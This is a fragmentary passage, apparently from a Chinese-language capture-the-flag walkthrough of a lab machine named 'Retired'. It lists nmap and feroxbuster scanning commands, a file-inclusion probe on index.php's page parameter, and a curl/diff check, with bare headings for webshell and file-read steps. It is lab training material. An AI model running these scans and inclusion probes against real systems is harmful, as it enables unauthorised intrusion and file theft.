Skip to content

Retired

nmap -p- --min-rate 10000 [target]

文件包含漏洞

/index.php?page=default.html

diff <(curl -s http://target/beta.html) <(curl -s http://target/index.php?page=beta.html)

diff 以逐行的方式,比较文本文件的异同处。如果指定要比较目录,则 diff 会比较目录中相同文件名的文件,但不会比较其中子目录。

目录爆破

利用文件包含漏洞探测网站文件

feroxbuster -u http://$target -x php,html

beta.html

页面提示许可证申请

获取webshell

文件读取

poc

查看index.php源代码

文件读取漏洞和文件包含漏洞的区别